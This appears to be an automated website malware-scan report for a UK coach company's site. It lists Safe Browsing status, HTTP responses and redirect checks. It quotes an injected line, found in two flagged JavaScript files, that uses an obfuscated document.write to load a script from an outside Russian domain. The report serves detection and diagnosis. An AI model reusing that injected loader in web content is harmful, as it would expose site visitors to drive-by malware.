Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buddens-coaches.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://buddens-coaches.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 22:55:35 GMT Location: http://www.buddens-coaches.co.uk/ Server: Apache/2 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buddens-coaches.co.uk/ | 200 OK Content-Length: 7276 Content-Type: text/html | clean |
http://www.buddens-coaches.co.uk/files/scripts.js | 200 OK Content-Length: 2146 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1796 bytes skipped]... (!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } function MM_reloadPage(init) { if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Operating_System.js"></scri'+'pt>'); Antivirus reports:
| ||
http://buddens-coaches.co.uk/files/DropDownMenuX.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 22:55:36 GMT Location: http://www.buddens-coaches.co.uk/files/DropDownMenuX.js Server: Apache/2 Content-Length: 336 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buddens-coaches.co.uk/files/dropdownmenux.js | 404 Not Found Content-Length: 416 Content-Type: text/html | clean |
http://www.buddens-coaches.co.uk/test404page.js | 404 Not Found Content-Length: 408 Content-Type: text/html | clean |
http://buddens-coaches.co.uk/files/ie5.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 22:55:37 GMT Location: http://www.buddens-coaches.co.uk/files/ie5.js Server: Apache/2 Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buddens-coaches.co.uk/files/ie5.js | 200 OK Content-Length: 2793 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1881 bytes skipped]... } this.length -= removed.length; for (i = this.length + elements.length - 1; i >= index + elements.length; --i) { this[i] = this[i - elements.length]; } for (i = 0; i < elements.length; ++i) { this[index + i] = elements[i]; } return removed; }; } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Operating_System.js"></scri'+'pt>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buddens-coaches.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 22:55:35 GMT
Location: http://www.buddens-coaches.co.uk/
Server: Apache/2
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
...314 bytes of data.
GET / HTTP/1.1
Host: buddens-coaches.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 22:55:35 GMT
Location: http://www.buddens-coaches.co.uk/
Server: Apache/2
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
...314 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: buddens-coaches.co.uk
Referer: http://www.google.com/search?q=buddens-coaches.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buddens-coaches.co.uk
Referer: http://www.google.com/search?q=buddens-coaches.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.